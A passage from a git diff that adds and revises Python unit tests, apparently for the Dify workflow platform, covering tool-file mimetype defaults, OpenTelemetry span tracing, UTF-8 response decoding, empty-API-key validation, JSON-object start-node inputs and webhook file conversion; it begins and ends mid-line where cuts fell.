1\nsubchunk 2."] + # ============================================================================ # Test Metadata Preservation diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. + +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py b/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py new file mode 100644 index 0000000000..b1380cd6d2 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py @@ -0,0 +1,60 @@ +""" +Test case for end node without value_type field (backward compatibility). + +This test validates that end nodes work correctly even when the value_type +field is missing from the output configuration, ensuring backward compatibility +with older workflow definitions. +""" + +from core.workflow.graph_events import ( + GraphRunStartedEvent, + GraphRunSucceededEvent, + NodeRunStartedEvent, + NodeRunStreamChunkEvent, + NodeRunSucceededEvent, +) + +from .test_table_runner import TableTestRunner, WorkflowTestCase + + +def test_end_node_without_value_type_field(): + """ + Test that end node works without explicit value_type field. + + The fixture implements a simple workflow that: + 1. Takes a query input from start node + 2. Passes it directly to end node + 3. End node outputs the value without specifying value_type + 4. Should correctly infer the type and output the value + + This ensures backward compatibility with workflow definitions + created before value_type became a required field. + """ + fixture_name = "end_node_without_value_type_field_workflow" + + case = WorkflowTestCase( + fixture_path=fixture_name, + inputs={"query": "test query"}, + expected_outputs={"query": "test query"}, + expected_event_sequence=[ + # Graph start + GraphRunStartedEvent, + # Start node + NodeRunStartedEvent, + NodeRunStreamChunkEvent, # Start node streams the input value + NodeRunSucceededEvent, + # End node + NodeRunStartedEvent, + NodeRunSucceededEvent, + # Graph end + GraphRunSucceededEvent, + ], + description="End node without value_type field should work correctly", + ) + + runner = TableTestRunner() + result = runner.run_test_case(case) + assert result.success, f"Test failed: {result.error}" + assert result.actual_outputs == {"query": "test query"}, ( + f"Expected output to be {{'query': 'test query'}}, got {result.actual_outputs}" + ) diff --git a/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py b/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py index 0f6b7e4ab6..47a5df92a4 100644 --- a/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py +++ b/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py @@ -1,3 +1,4 @@ +import json from unittest.mock import Mock, PropertyMock, patch import httpx @@ -138,3 +139,95 @@ def test_is_file_with_no_content_disposition(mock_response): type(mock_response).content = PropertyMock(return_value=bytes([0x00, 0xFF] * 512)) response = Response(mock_response) assert response.is_file + + +# UTF-8 Encoding Tests +@pytest.mark.parametrize( + ("content_bytes", "expected_text", "description"), + [ + # Chinese UTF-8 bytes + ( + b'{"message": "\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c"}', + '{"message": "你好世界"}', + "Chinese characters UTF-8", + ), + # Japanese UTF-8 bytes + ( + b'{"message": "\xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf"}', + '{"message": "こんにちは"}', + "Japanese characters UTF-8", + ), + # Korean UTF-8 bytes + ( + b'{"message": "\xec\x95\x88\xeb\x85\x95\xed\x95\x98\xec\x84\xb8\xec\x9a\x94"}', + '{"message": "안녕하세요"}', + "Korean characters UTF-8", + ), + # Arabic UTF-8 + (b'{"text": "\xd9\x85\xd8\xb1\xd8\xad\xd8\xa8\xd8\xa7"}', '{"text": "مرحبا"}', "Arabic characters UTF-8"), + # European characters UTF-8 + (b'{"text": "Caf\xc3\xa9 M\xc3\xbcnchen"}', '{"text": "Café München"}', "European accented characters"), + # Simple ASCII + (b'{"text": "Hello World"}', '{"text": "Hello World"}', "Simple ASCII text"), + ], +) +def test_text_property_utf8_decoding(mock_response, content_bytes, expected_text, description): + """Test that Response.text properly decodes UTF-8 content with charset_normalizer""" + mock_response.headers = {"content-type": "application/json; charset=utf-8"} + type(mock_response).content = PropertyMock(return_value=content_bytes) + # Mock httpx response.text to return something different (simulating potential encoding issues) + mock_response.text = "incorrect-fallback-text" # To ensure we are not falling back to httpx's text property + + response = Response(mock_response) + + # Our enhanced text property should decode properly using charset_normalizer + assert response.text == expected_text, ( + f"Failed for {description}: got {repr(response.text)}, expected {repr(expected_text)}" + ) + + +def test_text_property_fallback_to_httpx(mock_response): + """Test that Response.text falls back to httpx.text when charset_normalizer fails""" + mock_response.headers = {"content-type": "application/json"} + + # Create malformed UTF-8 bytes + malformed_bytes = b'{"text": "\xff\xfe\x00\x00 invalid"}' + type(mock_response).content = PropertyMock(return_value=malformed_bytes) + + # Mock httpx.text to return some fallback value + fallback_text = '{"text": "fallback"}' + mock_response.text = fallback_text + + response = Response(mock_response) + + # Should fall back to httpx's text when charset_normalizer fails + assert response.text == fallback_text + + +@pytest.mark.parametrize( + ("json_content", "description"), + [ + # JSON with escaped Unicode (like Flask jsonify()) + ('{"message": "\\u4f60\\u597d\\u4e16\\u754c"}', "JSON with escaped Unicode"), + # JSON with mixed escape sequences and UTF-8 + ('{"mixed": "Hello \\u4f60\\u597d"}', "Mixed escaped and regular text"), + # JSON with complex escape sequences + ('{"complex": "\\ud83d\\ude00\\u4f60\\u597d"}', "Emoji and Chinese escapes"), + ], +) +def test_text_property_with_escaped_unicode(mock_response, json_content, description): + """Test Response.text with JSON containing Unicode escape sequences""" + mock_response.headers = {"content-type": "application/json"} + + content_bytes = json_content.encode("utf-8") + type(mock_response).content = PropertyMock(return_value=content_bytes) + mock_response.text = json_content # httpx would return the same for valid UTF-8 + + response = Response(mock_response) + + # Should preserve the escape sequences (valid JSON) + assert response.text == json_content, f"Failed for {description}" + + # The text should be valid JSON that can be parsed back to proper Unicode + parsed = json.loads(response.text) + assert isinstance(parsed, dict), f"Invalid JSON for {description}" diff --git a/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py b/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py index f040a92b6f..27df938102 100644 --- a/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py +++ b/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py @@ -1,3 +1,5 @@ +import pytest + from core.workflow.nodes.http_request import ( BodyData, HttpRequestNodeAuthorization, @@ -5,6 +7,7 @@ from core.workflow.nodes.http_request import ( HttpRequestNodeData, ) from core.workflow.nodes.http_request.entities import HttpRequestNodeTimeout +from core.workflow.nodes.http_request.exc import AuthorizationConfigError from core.workflow.nodes.http_request.executor import Executor from core.workflow.runtime import VariablePool from core.workflow.system_variable import SystemVariable @@ -348,3 +351,127 @@ def test_init_params(): executor = create_executor("key1:value1\n\nkey2:value2\n\n") executor._init_params() assert executor.params == [("key1", "value1"), ("key2", "value2")] + + +def test_empty_api_key_raises_error_bearer(): + """Test that empty API key raises AuthorizationConfigError for bearer auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": ""}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_empty_api_key_raises_error_basic(): + """Test that empty API key raises AuthorizationConfigError for basic auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "basic", "api_key": ""}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_empty_api_key_raises_error_custom(): + """Test that empty API key raises AuthorizationConfigError for custom auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "custom", "api_key": "", "header": "X-Custom-Auth"}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_whitespace_only_api_key_raises_error(): + """Test that whitespace-only API key raises AuthorizationConfigError.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": " "}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_valid_api_key_works(): + """Test that valid API key works correctly for bearer auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": "valid-api-key-123"}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + executor = Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + # Should not raise an error + headers = executor._assembling_headers() + assert "Authorization" in headers + assert headers["Authorization"] == "Bearer valid-api-key-123" diff --git a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py index 83799c9508..539e72edb5 100644 --- a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py +++ b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py @@ -1,3 +1,4 @@ +import json import time import pytest @@ -46,14 +47,16 @@ def make_start_node(user_inputs, variables): def test_json_object_valid_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age"], + } + ) variables = [ VariableEntity( @@ -65,7 +68,7 @@ def test_json_object_valid_schema(): ) ] - user_inputs = {"profile": {"age": 20, "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": 20, "name": "Tom"})} node = make_start_node(user_inputs, variables) result = node._run() @@ -74,12 +77,23 @@ def test_json_object_valid_schema(): def test_json_object_invalid_json_string(): + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, required=True, + json_schema=schema, ) ] @@ -88,38 +102,21 @@ def test_json_object_invalid_json_string(): node = make_start_node(user_inputs, variables) - with pytest.raises(ValueError, match="profile must be a JSON object"): - node._run() - - -@pytest.mark.parametrize("value", ["[1, 2, 3]", "123"]) -def test_json_object_valid_json_but_not_object(value): - variables = [ - VariableEntity( - variable="profile", - label="profile", - type=VariableEntityType.JSON_OBJECT, - required=True, - ) - ] - - user_inputs = {"profile": value} - - node = make_start_node(user_inputs, variables) - - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match='{"age": 20, "name": "Tom" must be a valid JSON object'): node._run() def test_json_object_does_not_match_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -132,7 +129,7 @@ def test_json_object_does_not_match_schema(): ] # age is a string, which violates the schema (expects number) - user_inputs = {"profile": {"age": "twenty", "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": "twenty", "name": "Tom"})} node = make_start_node(user_inputs, variables) @@ -141,14 +138,16 @@ def test_json_object_does_not_match_schema(): def test_json_object_missing_required_schema_field(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -161,7 +160,7 @@ def test_json_object_missing_required_schema_field(): ] # Missing required field "name" - user_inputs = {"profile": {"age": 20}} + user_inputs = {"profile": json.dumps({"age": 20})} node = make_start_node(user_inputs, variables) @@ -214,7 +213,7 @@ def test_json_object_optional_variable_not_provided(): variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, - required=False, + required=True, ) ] @@ -223,5 +222,5 @@ def test_json_object_optional_variable_not_provided(): node = make_start_node(user_inputs, variables) # Current implementation raises a validation error even when the variable is optional - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match="profile is required in input form"): node._run() diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == 